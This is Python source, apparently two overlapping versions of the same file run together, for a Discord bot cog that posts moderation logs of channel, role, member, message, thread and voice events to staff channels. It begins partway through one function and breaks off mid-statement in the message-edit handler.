Not sure why, but it happens continue key = key[5:] # Remove "root." prefix if "[" in key: key = key.split("[", 1)[0] if "." in key: key = key.split(".", 1)[0] if key in done or key == "color": continue if key in ROLE_CHANGES_UNSUPPORTED: changes.append(f"**{key.title()}** updated") else: new = value["new_value"] old = value["old_value"] changes.append(f"**{key.title()}:** `{old}` **→** `{new}`") done.append(key) if not changes: return message = "" for item in sorted(changes): message += f"{Emojis.bullet} {item}\n" message = f"**{after.name}** (`{after.id}`)\n{message}" await self.send_log_message( Icons.crown_blurple, Colour.og_blurple(), "Role updated", message ) @Cog.listener() async def on_guild_update(self, before: discord.Guild, after: discord.Guild) -> None: """Log guild update event to mod log.""" if before.id != GuildConstant.id: return diff = DeepDiff(before, after) changes = [] done = [] diff_values = diff.get("values_changed", {}) diff_values.update(diff.get("type_changes", {})) for key, value in diff_values.items(): if not key: # Not sure why, but it happens continue key = key[5:] # Remove "root." prefix if "[" in key: key = key.split("[", 1)[0] if "." in key: key = key.split(".", 1)[0] if key in done: continue new = value["new_value"] old = value["old_value"] changes.append(f"**{key.title()}:** `{old}` **→** `{new}`") done.append(key) if not changes: return message = "" for item in sorted(changes): message += f"{Emojis.bullet} {item}\n" message = f"**{after.name}** (`{after.id}`)\n{message}" await self.send_log_message( Icons.guild_update, Colour.og_blurple(), "Guild updated", message, thumbnail=after.icon.with_static_format("png") ) @Cog.listener() async def on_member_ban(self, guild: discord.Guild, member: discord.Member) -> None: """Log ban event to user log.""" if guild.id != GuildConstant.id: return if member.id in self._ignored[Event.member_ban]: self._ignored[Event.member_ban].remove(member.id) return await self.send_log_message( Icons.user_ban, Colours.soft_red, "User banned", format_user(member), thumbnail=member.display_avatar.url, channel_id=Channels.user_log ) @Cog.listener() async def on_member_join(self, member: discord.Member) -> None: """Log member join event to user log.""" if member.guild.id != GuildConstant.id: return now = datetime.now(timezone.utc) difference = abs(relativedelta(now, member.created_at)) message = format_user(member) + "\n\n**Account age:** " + time.humanize_delta(difference) if difference.days < 1 and difference.months < 1 and difference.years < 1: # New user account! message = f"{Emojis.new} {message}" await self.send_log_message( Icons.sign_in, Colours.soft_green, "User joined", message, thumbnail=member.display_avatar.url, channel_id=Channels.user_log ) @Cog.listener() async def on_member_remove(self, member: discord.Member) -> None: """Log member leave event to user log.""" if member.guild.id != GuildConstant.id: return if member.id in self._ignored[Event.member_remove]: self._ignored[Event.member_remove].remove(member.id) return await self.send_log_message( Icons.sign_out, Colours.soft_red, "User left", format_user(member), thumbnail=member.display_avatar.url, channel_id=Channels.user_log ) @Cog.listener() async def on_member_unban(self, guild: discord.Guild, member: discord.User) -> None: """Log member unban event to mod log.""" if guild.id != GuildConstant.id: return if member.id in self._ignored[Event.member_unban]: self._ignored[Event.member_unban].remove(member.id) return await self.send_log_message( Icons.user_unban, Colour.og_blurple(), "User unbanned", format_user(member), thumbnail=member.display_avatar.url, channel_id=Channels.mod_log ) @staticmethod def get_role_diff(before: t.List[discord.Role], after: t.List[discord.Role]) -> t.List[str]: """Return a list of strings describing the roles added and removed.""" changes = [] before_roles = set(before) after_roles = set(after) for role in (before_roles - after_roles): changes.append(f"**Role removed:** {role.name} (`{role.id}`)") for role in (after_roles - before_roles): changes.append(f"**Role added:** {role.name} (`{role.id}`)") return changes @Cog.listener() async def on_member_update(self, before: discord.Member, after: discord.Member) -> None: """Log member update event to user log.""" if before.guild.id != GuildConstant.id: return if before.id in self._ignored[Event.member_update]: self._ignored[Event.member_update].remove(before.id) return changes = self.get_role_diff(before.roles, after.roles) # The regex is a simple way to exclude all sequence and mapping types. diff = DeepDiff(before, after, exclude_regex_paths=r".*\[.*") # A type change seems to always take precedent over a value change. Furthermore, it will # include the value change along with the type change anyway. Therefore, it's OK to # "overwrite" values_changed; in practice there will never even be anything to overwrite. diff_values = {**diff.get("values_changed", {}), **diff.get("type_changes", {})} for attr, value in diff_values.items(): if not attr: # Not sure why, but it happens. continue attr = attr[5:] # Remove "root." prefix. attr = attr.replace("_", " ").replace(".", " ").capitalize() new = value.get("new_value") old = value.get("old_value") changes.append(f"**{attr}:** `{old}` **→** `{new}`") if not changes: return message = "" for item in sorted(changes): message += f"{Emojis.bullet} {item}\n" message = f"{format_user(after)}\n{message}" await self.send_log_message( icon_url=Icons.user_update, colour=Colour.og_blurple(), title="Member updated", text=message, thumbnail=after.display_avatar.url, channel_id=Channels.user_log ) def is_message_blacklisted(self, message: Message) -> bool: """Return true if the message is in a blacklisted thread or channel.""" # Ignore bots or DMs if message.author.bot or not message.guild: return True return self.is_channel_ignored(message.channel.id) def is_channel_ignored(self, channel_id: int) -> bool: """ Return true if the channel, or parent channel in the case of threads, passed should be ignored by modlog. Currently ignored channels are: 1. Channels not in the guild we care about (constants.Guild.id). 2. Channels that mods do not have view permissions to 3. Channels in constants.Guild.modlog_blacklist """ channel = self.bot.get_channel(channel_id) # Ignore not found channels, DMs, and messages outside of the main guild. if not channel or not hasattr(channel, "guild") or channel.guild.id != GuildConstant.id: return True # Look at the parent channel of a thread. if isinstance(channel, Thread): channel = channel.parent # Mod team doesn't have view permission to the channel. if not channel.permissions_for(channel.guild.get_role(Roles.mod_team)).view_channel: return True return channel.id in GuildConstant.modlog_blacklist async def log_cached_deleted_message(self, message: discord.Message) -> None: """ Log the message's details to message change log. This is called when a cached message is deleted. """ channel = message.channel author = message.author if self.is_message_blacklisted(message): return if message.id in self._ignored[Event.message_delete]: self._ignored[Event.message_delete].remove(message.id) return if channel.category: response = ( f"**Author:** {format_user(author)}\n" f"**Channel:** {channel.category}/#{channel.name} (`{channel.id}`)\n" f"**Message ID:** `{message.id}`\n" f"**Sent at:** {format_dt(message.created_at)}\n" f"[Jump to message]({message.jump_url})\n" "\n" ) else: response = ( f"**Author:** {format_user(author)}\n" f"**Channel:** #{channel.name} (`{channel.id}`)\n" f"**Message ID:** `{message.id}`\n" f"**Sent at:** {format_dt(message.created_at)}\n" f"[Jump to message]({message.jump_url})\n" "\n" ) if message.attachments: # Prepend the message metadata with the number of attachments response = f"**Attachments:** {len(message.attachments)}\n" + response # Shorten the message content if necessary content = message.clean_content remaining_chars = 4090 - len(response) if len(content) > remaining_chars: botlog_url = await self.upload_log(messages=[message], actor_id=message.author.id) ending = f"\n\nMessage truncated, [full message here]({botlog_url})." truncation_point = remaining_chars - len(ending) content = f"{content[:truncation_point]}...{ending}" response += f"{content}" await self.send_log_message( Icons.message_delete, Colours.soft_red, "Message deleted", response, channel_id=Channels.message_log ) async def log_uncached_deleted_message(self, event: discord.RawMessageDeleteEvent) -> None: """ Log the message's details to message change log. This is called when a message absent from the cache is deleted. Hence, the message contents aren't logged. """ await self.bot.wait_until_guild_available() if self.is_channel_ignored(event.channel_id): return if event.message_id in self._ignored[Event.message_delete]: self._ignored[Event.message_delete].remove(event.message_id) return channel = self.bot.get_channel(event.channel_id) if channel.category: response = ( f"**Channel:** {channel.category}/#{channel.name} (`{channel.id}`)\n" f"**Message ID:** `{event.message_id}`\n" f"**Sent at:** {format_dt(snowflake_time(event.message_id))}\n" "\n" "This message was not cached, so the message content cannot be displayed." ) else: response = ( f"**Channel:** #{channel.name} (`{channel.id}`)\n" f"**Message ID:** `{event.message_id}`\n" f"**Sent at:** {format_dt(snowflake_time(event.message_id))}\n" "\n" "This message was not cached, so the message content cannot be displayed." ) await self.send_log_message( Icons.message_delete, Colours.soft_red, "Message deleted", response, channel_id=Channels.message_log ) @Cog.listener() async def on_raw_message_delete(self, event: discord.RawMessageDeleteEvent) -> None: """Log message deletions to message change log.""" if event.cached_message is not None: await self.log_cached_deleted_message(event.cached_message) else: await self.log_uncached_deleted_message(event) @Cog.listener() async def on_message_edit(self, msg_before: discord.Message, msg_after: discord.Message) -> None: """Log message edit event to message change log.""" if self.is_message_blacklisted(msg_before): return self._cached_edits.append(msg_before.id) if msg_before.content == msg_after.content: return channel = msg_before.channel channel_name = f"{channel.category}/#{channel.name}" if channel.category else f"#{channel.name}" cleaned_contents = (escape_markdown(msg.clean_content).split() for msg in (msg_before, msg_after)) # Getting the difference per words and group them by type - add, remove, same # Note that this is intended grouping without sorting diff = difflib.ndiff(*cleaned_contents) diff_groups = tuple( (diff_type, tuple(s[2:] for s in diff_words)) for diff_type, diff_words in itertools.groupby(diff, key=lambda s: s[0]) ) content_before: t.List[str] = [] content_after: t.List[str] = [] for index, (diff_type, words) in enumerate(diff_groups): sub = ' '.join(words) if diff_type == '-': content_before.append(f"[{sub}](http://o.hi)") elif diff_type == '+': content_after.append(f"[{sub}](http://o.hi)") elif diff_type == ' ': if len(words) > 2: sub = ( f"{words[0] if index > 0 else ""}" " ... " f"{words[-1] if index < len(diff_groups) - 1 else ""}" ) content_before.append(sub) content_after.append(sub) response = ( f"**Author:** {format_user(msg_before.author)}\n" f"**Channel:** {channel_name} (`{channel.id}`)\n" f"**Message ID:** `{msg_before.id}`\n" "\n" f"**Before**:\n{" ".join(content_before)}\n" f"**After**:\n{" ".join(content_after)}\n" "\n" f"[Jump to message]({msg_after.jump_url})" ) if msg_before.edited_at: # Message was previously edited, to assist with self-bot detection, use the edited_at # datetime as the baseline and create a human-readable delta between this edit event # and the last time the message was edited timestamp = msg_before.edited_at delta = time.humanize_delta(msg_after.edited_at, msg_before.edited_at) footer = f"Last edited {delta} ago" else: # Message was not previously edited, use the created_at datetime as the baseline, no # delta calculation needed timestamp = msg_before.created_at footer = None await self.send_log_message( Icons.message_edit, Colour.og_blurple(), "Message edited", response, channel_id=Channels.message_log, timestamp_override=timestamp, footer=footer ) @Cog.listener() async def on_raw_message_edit(self, event: discord.RawMessageUpdateEvent) -> None: """Log raw message edit event to message change log.""" if event.guild_id is None: return # ignore DM edits await self.bot.wait_until_guild_available() try: channel = self.bot.get_channel(int(event.data["channel_id"])) message = await channel.fetch_message(event.message_id) except discord.NotFound: # Was deleted before we got the event return if self.is_message_blacklisted(message): return await asyncio.sleep(1) # Wait here in case the normal event was fired if event.message_id in self._cached_edits: # It was in the cache and the normal event was fired, so we can just ignore it self._cached_edits.remove(event.message_id) return channel = message.channel channel_name = f"{channel.category}/#{channel.name}" if channel.category else f"#{channel.name}" before_response = ( f"**Author:** {format_user(message.author)}\n" f"**Channel:** {channel_name} (`{channel.id}`)\n" f"**Message ID:** `{message.id}`\n" "\n" "This message was not cached, so the message content cannot be displayed." ) after_response = ( f"**Author:** {format_user(message.author)}\n" f"**Channel:** {channel_name} (`{channel.id}`)\n" f"**Message ID:** `{message.id}`\n" "\n" f"{message.clean_content}" ) await self.send_log_message( Icons.message_edit, Colour.og_blurple(), "Message edited (Before)", before_response, channel_id=Channels.message_log ) await self.send_log_message( Icons.message_edit, Colour.og_blurple(), "Message edited (After)", after_response, channel_id=Channels.message_log ) @Cog.listener() async def on_thread_update(self, before: Thread, after: Thread) -> None: """Log thread archiving, un-archiving and name edits.""" if self.is_channel_ignored(after.id): log.trace("Ignoring update of thread %s (%d)", after.mention, after.id) return if before.name != after.name: await self.send_log_message( Icons.hash_blurple, Colour.og_blurple(), "Thread name edited", ( f"Thread {after.mention} (`{after.id}`) from {after.parent.mention} (`{after.parent.id}`): " f"`{before.name}` -> `{after.name}`" ) ) return if not before.archived and after.archived: colour = Colours.soft_red action = "archived" icon = Icons.hash_red elif before.archived and not after.archived: colour = Colours.soft_green action = "un-archived" icon = Icons.hash_green else: return await self.send_log_message( icon, colour, f"Thread {action}", ( f"Thread {after.mention} ({after.name}, `{after.id}`) from {after.parent.mention} " f"(`{after.parent.id}`) was {action}" ) ) @Cog.listener() async def on_thread_delete(self, thread: Thread) -> None: """Log thread deletion.""" if self.is_channel_ignored(thread.id): log.trace("Ignoring deletion of thread %s (%d)", thread.mention, thread.id) return await self.send_log_message( Icons.hash_red, Colours.soft_red, "Thread deleted", ( f"Thread {thread.mention} ({thread.name}, `{thread.id}`) from {thread.parent.mention} " f"(`{thread.parent.id}`) deleted" ) ) @Cog.listener() async def on_thread_join(self, thread: Thread) -> None: """Log thread creation.""" # If we are in the thread already we can most probably assume we already logged it? # We don't really have a better way of doing this since the API doesn't make any difference between the two if thread.me: return if self.is_channel_ignored(thread.id): log.trace("Ignoring creation of thread %s (%d)", thread.mention, thread.id) return await self.send_log_message( Icons.hash_green, Colours.soft_green, "Thread created", ( f"Thread {thread.mention} ({thread.name}, `{thread.id}`) from {thread.parent.mention} " f"(`{thread.parent.id}`) created" ) ) @Cog.listener() async def on_voice_state_update( self, member: discord.Member, before: discord.VoiceState, after: discord.VoiceState ) -> None: """Log member voice state changes to the voice log channel.""" if ( member.guild.id != GuildConstant.id or (before.channel and self.is_channel_ignored(before.channel.id)) or (after.channel and self.is_channel_ignored(after.channel.id)) ): return if member.id in self._ignored[Event.voice_state_update]: self._ignored[Event.voice_state_update].remove(member.id) return # Exclude all channel attributes except the name. diff = DeepDiff( before, after, exclude_paths=("root.session_id", "root.afk"), exclude_regex_paths=r"root\.channel\.(?!name)", ) # A type change seems to always take precedent over a value change. Furthermore, it will # include the value change along with the type change anyway. Therefore, it's OK to # "overwrite" values_changed; in practice there will never even be anything to overwrite. diff_values = {**diff.get("values_changed", {}), **diff.get("type_changes", {})} icon = Icons.voice_state_blue colour = Colour.og_blurple() changes = [] for attr, values in diff_values.items(): if not attr: # Not sure why, but it happens. continue old = values["old_value"] new = values["new_value"] attr = attr[5:] # Remove "root." prefix. attr = VOICE_STATE_ATTRIBUTES.get(attr, attr.replace("_", " ").capitalize()) changes.append(f"**{attr}:** `{old}` **→** `{new}`") # Set the embed icon and colour depending on which attribute changed. if any(name in attr for name in ("Channel", "deaf", "mute")): if new is None or new is True: # Left a channel or was muted/deafened. icon = Icons.voice_state_red colour = Colours.soft_red elif old is None or old is True: # Joined a channel or was unmuted/undeafened. icon = Icons.voice_state_green colour = Colours.soft_green if not changes: return message = "\n".join(f"{Emojis.bullet} {item}" for item in sorted(changes)) message = f"{format_user(member)}\n{message}" await self.send_log_message( icon_url=icon, colour=colour, title="Voice state updated", text=message, thumbnail=member.display_avatar.url, channel_id=Channels.voice_log ) def setup(bot: Bot) -> None: """Load the ModLog cog.""" bot.add_cog(ModLog(bot))
import asyncio import difflib import itertools import typing as t from datetime import datetime, timezone from itertools import zip_longest import discord from dateutil.relativedelta import relativedelta from deepdiff import DeepDiff from discord import Colour, Message, Thread from discord.abc import GuildChannel from discord.ext.commands import Cog, Context from discord.utils import escape_markdown, format_dt, snowflake_time from bot.bot import Bot from bot.constants import Categories, Channels, Colours, Emojis, Event, Guild as GuildConstant, Icons, Roles, URLs from bot.log import get_logger from bot.utils import time from bot.utils.messages import format_user log = get_logger(__name__) GUILD_CHANNEL = t.Union[discord.CategoryChannel, discord.TextChannel, discord.VoiceChannel] CHANNEL_CHANGES_UNSUPPORTED = ("permissions",) CHANNEL_CHANGES_SUPPRESSED = ("_overwrites", "position") ROLE_CHANGES_UNSUPPORTED = ("colour", "permissions") VOICE_STATE_ATTRIBUTES = { "channel.name": "Channel", "self_stream": "Streaming", "self_video": "Broadcasting", } class ModLog(Cog, name="ModLog"): """Logging for server events and staff actions.""" def __init__(self, bot: Bot): self.bot = bot self._ignored = {event: [] for event in Event} self._cached_edits = [] async def upload_log( self, messages: t.Iterable[discord.Message], actor_id: int, attachments: t.Iterable[t.List[str]] = None ) -> str: """Upload message logs to the database and return a URL to a page for viewing the logs.""" if attachments is None: attachments = [] response = await self.bot.api_client.post( 'bot/deleted-messages', json={ 'actor': actor_id, 'creation': datetime.now(timezone.utc).isoformat(), 'deletedmessage_set': [ { 'id': message.id, 'author': message.author.id, 'channel_id': message.channel.id, 'content': message.content.replace("\0", ""), # Null chars cause 400. 'embeds': [embed.to_dict() for embed in message.embeds], 'attachments': attachment, } for message, attachment in zip_longest(messages, attachments, fillvalue=[]) ] } ) return f"{URLs.site_logs_view}/{response['id']}" def ignore(self, event: Event, *items: int) -> None: """Add event to ignored events to suppress log emission.""" for item in items: if item not in self._ignored[event]: self._ignored[event].append(item) async def send_log_message( self, icon_url: t.Optional[str], colour: t.Union[discord.Colour, int], title: t.Optional[str], text: str, thumbnail: t.Optional[t.Union[str, discord.Asset]] = None, channel_id: int = Channels.mod_log, ping_everyone: bool = False, files: t.Optional[t.List[discord.File]] = None, content: t.Optional[str] = None, additional_embeds: t.Optional[t.List[discord.Embed]] = None, timestamp_override: t.Optional[datetime] = None, footer: t.Optional[str] = None, ) -> Context: """Generate log embed and send to logging channel.""" await self.bot.wait_until_guild_available() # Truncate string directly here to avoid removing newlines embed = discord.Embed( description=text[:4093] + "..." if len(text) > 4096 else text ) if title and icon_url: embed.set_author(name=title, icon_url=icon_url) embed.colour = colour embed.timestamp = timestamp_override or datetime.utcnow() if footer: embed.set_footer(text=footer) if thumbnail: embed.set_thumbnail(url=thumbnail) if ping_everyone: if content: content = f"<@&{Roles.moderators}> {content}" else: content = f"<@&{Roles.moderators}>" # Truncate content to 2000 characters and append an ellipsis. if content and len(content) > 2000: content = content[:2000 - 3] + "..." channel = self.bot.get_channel(channel_id) log_message = await channel.send( content=content, embed=embed, files=files ) if additional_embeds: for additional_embed in additional_embeds: await channel.send(embed=additional_embed) return await self.bot.get_context(log_message) # Optionally return for use with antispam @Cog.listener() async def on_guild_channel_create(self, channel: GUILD_CHANNEL) -> None: """Log channel create event to mod log.""" if channel.guild.id != GuildConstant.id: return if isinstance(channel, discord.CategoryChannel): title = "Category created" message = f"{channel.name} (`{channel.id}`)" elif isinstance(channel, discord.VoiceChannel): title = "Voice channel created" if channel.category: message = f"{channel.category}/{channel.name} (`{channel.id}`)" else: message = f"{channel.name} (`{channel.id}`)" else: title = "Text channel created" if channel.category: message = f"{channel.category}/{channel.name} (`{channel.id}`)" else: message = f"{channel.name} (`{channel.id}`)" await self.send_log_message(Icons.hash_green, Colours.soft_green, title, message) @Cog.listener() async def on_guild_channel_delete(self, channel: GUILD_CHANNEL) -> None: """Log channel delete event to mod log.""" if channel.guild.id != GuildConstant.id: return if isinstance(channel, discord.CategoryChannel): title = "Category deleted" elif isinstance(channel, discord.VoiceChannel): title = "Voice channel deleted" else: title = "Text channel deleted" if channel.category and not isinstance(channel, discord.CategoryChannel): message = f"{channel.category}/{channel.name} (`{channel.id}`)" else: message = f"{channel.name} (`{channel.id}`)" await self.send_log_message( Icons.hash_red, Colours.soft_red, title, message ) @Cog.listener() async def on_guild_channel_update(self, before: GUILD_CHANNEL, after: GuildChannel) -> None: """Log channel update event to mod log.""" if before.guild.id != GuildConstant.id: return if before.id in self._ignored[Event.guild_channel_update]: self._ignored[Event.guild_channel_update].remove(before.id) return # Two channel updates are sent for a single edit: 1 for topic and 1 for category change. # TODO: remove once support is added for ignoring multiple occurrences for the same channel. help_categories = (Categories.help_available, Categories.help_dormant, Categories.help_in_use) if after.category and after.category.id in help_categories: return diff = DeepDiff(before, after) changes = [] done = [] diff_values = diff.get("values_changed", {}) diff_values.update(diff.get("type_changes", {})) for key, value in diff_values.items(): if not key: # Not sure why, but it happens continue key = key[5:] # Remove "root." prefix if "[" in key: key = key.split("[", 1)[0] if "." in key: key = key.split(".", 1)[0] if key in done or key in CHANNEL_CHANGES_SUPPRESSED: continue if key in CHANNEL_CHANGES_UNSUPPORTED: changes.append(f"**{key.title()}** updated") else: new = value["new_value"] old = value["old_value"] # Discord does not treat consecutive backticks ("``") as an empty inline code block, so the markdown # formatting is broken when `new` and/or `old` are empty values. "None" is used for these cases so # formatting is preserved. changes.append(f"**{key.title()}:** `{old or 'None'}` **→** `{new or 'None'}`") done.append(key) if not changes: return message = "" for item in sorted(changes): message += f"{Emojis.bullet} {item}\n" if after.category: message = f"**{after.category}/#{after.name} (`{after.id}`)**\n{message}" else: message = f"**#{after.name}** (`{after.id}`)\n{message}" await self.send_log_message( Icons.hash_blurple, Colour.og_blurple(), "Channel updated", message ) @Cog.listener() async def on_guild_role_create(self, role: discord.Role) -> None: """Log role create event to mod log.""" if role.guild.id != GuildConstant.id: return await self.send_log_message( Icons.crown_green, Colours.soft_green, "Role created", f"`{role.id}`" ) @Cog.listener() async def on_guild_role_delete(self, role: discord.Role) -> None: """Log role delete event to mod log.""" if role.guild.id != GuildConstant.id: return await self.send_log_message( Icons.crown_red, Colours.soft_red, "Role removed", f"{role.name} (`{role.id}`)" ) @Cog.listener() async def on_guild_role_update(self, before: discord.Role, after: discord.Role) -> None: """Log role update event to mod log.""" if before.guild.id != GuildConstant.id: return diff = DeepDiff(before, after) changes = [] done = [] diff_values = diff.get("values_changed", {}) diff_values.update(diff.get("type_changes", {})) for key, value in diff_values.items(): if not key: # Not sure why, but it happens continue key = key[5:] # Remove "root." prefix if "[" in key: key = key.split("[", 1)[0] if "." in key: key = key.split(".", 1)[0] if key in done or key == "color": continue if key in ROLE_CHANGES_UNSUPPORTED: changes.append(f"**{key.title()}** updated") else: new = value["new_value"] old = value["old_value"] changes.append(f"**{key.title()}:** `{old}` **→** `{new}`") done.append(key) if not changes: return message = "" for item in sorted(changes): message += f"{Emojis.bullet} {item}\n" message = f"**{after.name}** (`{after.id}`)\n{message}" await self.send_log_message( Icons.crown_blurple, Colour.og_blurple(), "Role updated", message ) @Cog.listener() async def on_guild_update(self, before: discord.Guild, after: discord.Guild) -> None: """Log guild update event to mod log.""" if before.id != GuildConstant.id: return diff = DeepDiff(before, after) changes = [] done = [] diff_values = diff.get("values_changed", {}) diff_values.update(diff.get("type_changes", {})) for key, value in diff_values.items(): if not key: # Not sure why, but it happens continue key = key[5:] # Remove "root." prefix if "[" in key: key = key.split("[", 1)[0] if "." in key: key = key.split(".", 1)[0] if key in done: continue new = value["new_value"] old = value["old_value"] changes.append(f"**{key.title()}:** `{old}` **→** `{new}`") done.append(key) if not changes: return message = "" for item in sorted(changes): message += f"{Emojis.bullet} {item}\n" message = f"**{after.name}** (`{after.id}`)\n{message}" await self.send_log_message( Icons.guild_update, Colour.og_blurple(), "Guild updated", message, thumbnail=after.icon.with_static_format("png") ) @Cog.listener() async def on_member_ban(self, guild: discord.Guild, member: discord.Member) -> None: """Log ban event to user log.""" if guild.id != GuildConstant.id: return if member.id in self._ignored[Event.member_ban]: self._ignored[Event.member_ban].remove(member.id) return await self.send_log_message( Icons.user_ban, Colours.soft_red, "User banned", format_user(member), thumbnail=member.display_avatar.url, channel_id=Channels.user_log ) @Cog.listener() async def on_member_join(self, member: discord.Member) -> None: """Log member join event to user log.""" if member.guild.id != GuildConstant.id: return now = datetime.now(timezone.utc) difference = abs(relativedelta(now, member.created_at)) message = format_user(member) + "\n\n**Account age:** " + time.humanize_delta(difference) if difference.days < 1 and difference.months < 1 and difference.years < 1: # New user account! message = f"{Emojis.new} {message}" await self.send_log_message( Icons.sign_in, Colours.soft_green, "User joined", message, thumbnail=member.display_avatar.url, channel_id=Channels.user_log ) @Cog.listener() async def on_member_remove(self, member: discord.Member) -> None: """Log member leave event to user log.""" if member.guild.id != GuildConstant.id: return if member.id in self._ignored[Event.member_remove]: self._ignored[Event.member_remove].remove(member.id) return await self.send_log_message( Icons.sign_out, Colours.soft_red, "User left", format_user(member), thumbnail=member.display_avatar.url, channel_id=Channels.user_log ) @Cog.listener() async def on_member_unban(self, guild: discord.Guild, member: discord.User) -> None: """Log member unban event to mod log.""" if guild.id != GuildConstant.id: return if member.id in self._ignored[Event.member_unban]: self._ignored[Event.member_unban].remove(member.id) return await self.send_log_message( Icons.user_unban, Colour.og_blurple(), "User unbanned", format_user(member), thumbnail=member.display_avatar.url, channel_id=Channels.mod_log ) @staticmethod def get_role_diff(before: t.List[discord.Role], after: t.List[discord.Role]) -> t.List[str]: """Return a list of strings describing the roles added and removed.""" changes = [] before_roles = set(before) after_roles = set(after) for role in (before_roles - after_roles): changes.append(f"**Role removed:** {role.name} (`{role.id}`)") for role in (after_roles - before_roles): changes.append(f"**Role added:** {role.name} (`{role.id}`)") return changes @Cog.listener() async def on_member_update(self, before: discord.Member, after: discord.Member) -> None: """Log member update event to user log.""" if before.guild.id != GuildConstant.id: return if before.id in self._ignored[Event.member_update]: self._ignored[Event.member_update].remove(before.id) return changes = self.get_role_diff(before.roles, after.roles) # The regex is a simple way to exclude all sequence and mapping types. diff = DeepDiff(before, after, exclude_regex_paths=r".*\[.*") # A type change seems to always take precedent over a value change. Furthermore, it will # include the value change along with the type change anyway. Therefore, it's OK to # "overwrite" values_changed; in practice there will never even be anything to overwrite. diff_values = {**diff.get("values_changed", {}), **diff.get("type_changes", {})} for attr, value in diff_values.items(): if not attr: # Not sure why, but it happens. continue attr = attr[5:] # Remove "root." prefix. attr = attr.replace("_", " ").replace(".", " ").capitalize() new = value.get("new_value") old = value.get("old_value") changes.append(f"**{attr}:** `{old}` **→** `{new}`") if not changes: return message = "" for item in sorted(changes): message += f"{Emojis.bullet} {item}\n" message = f"{format_user(after)}\n{message}" await self.send_log_message( icon_url=Icons.user_update, colour=Colour.og_blurple(), title="Member updated", text=message, thumbnail=after.display_avatar.url, channel_id=Channels.user_log ) def is_message_blacklisted(self, message: Message) -> bool: """Return true if the message is in a blacklisted thread or channel.""" # Ignore bots or DMs if message.author.bot or not message.guild: return True return self.is_channel_ignored(message.channel.id) def is_channel_ignored(self, channel_id: int) -> bool: """ Return true if the channel, or parent channel in the case of threads, passed should be ignored by modlog. Currently ignored channels are: 1. Channels not in the guild we care about (constants.Guild.id). 2. Channels that mods do not have view permissions to 3. Channels in constants.Guild.modlog_blacklist """ channel = self.bot.get_channel(channel_id) # Ignore not found channels, DMs, and messages outside of the main guild. if not channel or not hasattr(channel, "guild") or channel.guild.id != GuildConstant.id: return True # Look at the parent channel of a thread. if isinstance(channel, Thread): channel = channel.parent # Mod team doesn't have view permission to the channel. if not channel.permissions_for(channel.guild.get_role(Roles.mod_team)).view_channel: return True return channel.id in GuildConstant.modlog_blacklist async def log_cached_deleted_message(self, message: discord.Message) -> None: """ Log the message's details to message change log. This is called when a cached message is deleted. """ channel = message.channel author = message.author if self.is_message_blacklisted(message): return if message.id in self._ignored[Event.message_delete]: self._ignored[Event.message_delete].remove(message.id) return if channel.category: response = ( f"**Author:** {format_user(author)}\n" f"**Channel:** {channel.category}/#{channel.name} (`{channel.id}`)\n" f"**Message ID:** `{message.id}`\n" f"**Sent at:** {format_dt(message.created_at)}\n" f"[Jump to message]({message.jump_url})\n" "\n" ) else: response = ( f"**Author:** {format_user(author)}\n" f"**Channel:** #{channel.name} (`{channel.id}`)\n" f"**Message ID:** `{message.id}`\n" f"**Sent at:** {format_dt(message.created_at)}\n" f"[Jump to message]({message.jump_url})\n" "\n" ) if message.attachments: # Prepend the message metadata with the number of attachments response = f"**Attachments:** {len(message.attachments)}\n" + response # Shorten the message content if necessary content = message.clean_content remaining_chars = 4090 - len(response) if len(content) > remaining_chars: botlog_url = await self.upload_log(messages=[message], actor_id=message.author.id) ending = f"\n\nMessage truncated, [full message here]({botlog_url})." truncation_point = remaining_chars - len(ending) content = f"{content[:truncation_point]}...{ending}" response += f"{content}" await self.send_log_message( Icons.message_delete, Colours.soft_red, "Message deleted", response, channel_id=Channels.message_log ) async def log_uncached_deleted_message(self, event: discord.RawMessageDeleteEvent) -> None: """ Log the message's details to message change log. This is called when a message absent from the cache is deleted. Hence, the message contents aren't logged. """ await self.bot.wait_until_guild_available() if self.is_channel_ignored(event.channel_id): return if event.message_id in self._ignored[Event.message_delete]: self._ignored[Event.message_delete].remove(event.message_id) return channel = self.bot.get_channel(event.channel_id) if channel.category: response = ( f"**Channel:** {channel.category}/#{channel.name} (`{channel.id}`)\n" f"**Message ID:** `{event.message_id}`\n" f"**Sent at:** {format_dt(snowflake_time(event.message_id))}\n" "\n" "This message was not cached, so the message content cannot be displayed." ) else: response = ( f"**Channel:** #{channel.name} (`{channel.id}`)\n" f"**Message ID:** `{event.message_id}`\n" f"**Sent at:** {format_dt(snowflake_time(event.message_id))}\n" "\n" "This message was not cached, so the message content cannot be displayed." ) await self.send_log_message( Icons.message_delete, Colours.soft_red, "Message deleted", response, channel_id=Channels.message_log ) @Cog.listener() async def on_raw_message_delete(self, event: discord.RawMessageDeleteEvent) -> None: """Log message deletions to message change log.""" if event.cached_message is not None: await self.log_cached_deleted_message(event.cached_message) else: await self.log_uncached_deleted_message(event) @Cog.listener() async def on_message_edit(self, msg_before: discord.Message, msg_after: discord.Message) -> None: """Log message edit event to message change log.""" if self.is_message_blacklisted(msg_before): return self._cached_edits.append(msg_before.id) if msg_before.content == msg_after.content: return channel = msg_before.channel channel_name = f"{channel.category}/#{channel.name}" if channel.category else f"#{channel.name}" cleaned_contents = (escape_markdown(msg.clean_content).split() for msg in (msg_before, msg_after)) # Getting the difference per words and group them by type - add, remove, same # Note that this is intended grouping without sorting diff = difflib.ndiff(*cleaned_contents) diff_groups = tuple( (diff_type, tuple(s[2:] for s in diff_words)) for diff_type, diff_words in itertools.groupby(diff, key=lambda s: s[0]) ) content_before: t.List[str] = [] content_after: t.List[str] = [] for index, (diff_type, words) in enumerate(diff_groups): sub = ' '.join(words) if diff_type == '-': content_before.append(f"[{sub}](http://o.hi)") elif diff_type == '+': content_after.append(f"[{sub}](http://o.hi)") elif diff_type == ' ': if len(words) > 2: sub = ( f"{words[0] if index > 0 else ''}" " ... " f"{words[-1] if index < len(diff_groups) - 1 else ''}" ) content_before.append(sub) content_after.append(sub) response = ( f"**Author:** {format_user(msg_before.author)}\n" f"**Channel:** {channel_name} (`{channel.id}`)\n" f"**Message ID:** `{msg_before.id}`\n" "\n" f"**Before**:\n{' '.join(content_before)}\n" f"**After**:\n{' '.join(content_after)}\n" "\n" f"[Jump to message]({msg_after.jump_url})" ) if msg_before.edited_at: # Message was previously edited, to assist with self-bot detection, use the edited_at # datetime as the baseline and create a human-readable delta between this edit event # and the last time the message was edited timestamp = msg_before.edited_at delta = time.humanize_delta(msg_after.edited_at, msg_before.edited_at) footer = 